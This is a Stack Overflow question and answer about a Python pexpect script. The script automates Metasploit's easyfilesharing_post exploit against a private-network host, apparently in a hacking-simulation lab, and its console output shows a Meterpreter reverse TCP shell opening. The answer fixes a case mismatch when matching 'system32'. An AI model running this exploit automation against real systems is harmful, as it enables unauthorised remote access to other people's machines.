0

I am trying to execute a pwd command on my metasploit session, then using pexpect, check if the correct result was returned.

Here is my function

def executeEasyFileSharing(target):
    print("Executing: "+"msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts "+target[1]+";run")
    print("About to metasploit")
    #Create logfile
    fout = open('mylog.txt', 'wb')

    child = pexpect.spawn("msfconsole -q -x "+ str('"use exploit/windows/http/easyfilesharing_post ;set rhosts '+target[1] +';run"'), encoding='utf-8')
    child.logfile = sys.stdout

    print(child.expect_exact("Meterpreter session 1 opened", timeout=300))
    import time
    time.sleep(10)
    child.sendline("pwd")
    child.expect("C:\WINDOWS\System32",timeout=50)
    print("Success")

executeEasyFileSharing(["buffer","192.168.1.86"])

Here is the console output seen when run:

─$ python3 execution.py                                                  130 ⨯
Executing: msfconsole -q -x 'use exploit/windows/http/easyfilesharing_post ;set rhosts 192.168.1.86;run'
About to metasploit
[] No payload configured, defaulting to windows/meterpreter/reverse_tcp
rhosts => 192.168.1.86
[] Started reverse TCP handler on 192.168.1.102:4444 
[] Sending stage (175174 bytes) to 192.168.1.86
[] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.86:59854 ) at 2022-03-05 13:41:46 +0000
0
pwd

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > Traceback (most recent call last):
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 50, in <module>
    executeEasyFileSharing(["buffer","192.168.1.86"])
  File "/home/barry/Desktop/HackSimScripts/HackingSim/execution.py", line 47, in executeEasyFileSharing
    child.expect("C:\WINDOWS\System32",timeout=50)
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 343, in expect
    return self.expect_list(compiled_pattern_list,
  File "/usr/lib/python3/dist-packages/pexpect/spawnbase.py", line 372, in expect_list
    return exp.expect_loop(timeout)
  File "/usr/lib/python3/dist-packages/pexpect/expect.py", line 181, in expect_loop
    return self.timeout(e)

The expected output should be that the function executes and Success is printed. pwd's result is clearly shown, so why isn't pexpect detecting it?

Dee Sharp
  • 9
  • 1
  • you expect `System32` with upper `S` but it sends `system32` with lower `s` - and this is big difference. – furas Mar 05 '22 at 19:44

1 Answers1

1

You expect System32 with upper S but it sends system32 with lower s - and this is problem.

This should work

child.expect("C:\WINDOWS\system32", timeout=50)

Eventually you can use (?i) to check as case insensitive

child.expect("(?i)C:\WINDOWS\System32", timeout=50)

Other question on Stackoverflow: What does (?i) mean in a Python/pexpect regex?

furas
  • 134,197
  • 12
  • 106
  • 148